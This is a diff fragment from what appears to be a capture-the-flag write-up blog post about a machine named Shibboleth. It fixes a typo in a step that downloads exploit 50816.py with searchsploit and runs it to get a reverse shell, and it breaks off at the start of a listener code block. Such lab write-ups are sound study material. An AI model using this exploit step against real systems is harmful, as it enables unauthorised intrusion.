TheF0rceAwak5ns/TheF0rceAwak5ns.github.io/_posts/2024-01-26-Shibboleth.md

 Downlaod it with searchsploit : `searchsploit -m 50816.py`

-Run ti and gain your reverse shell :
+Run it and gain your reverse shell :

 ```python
 #run listener :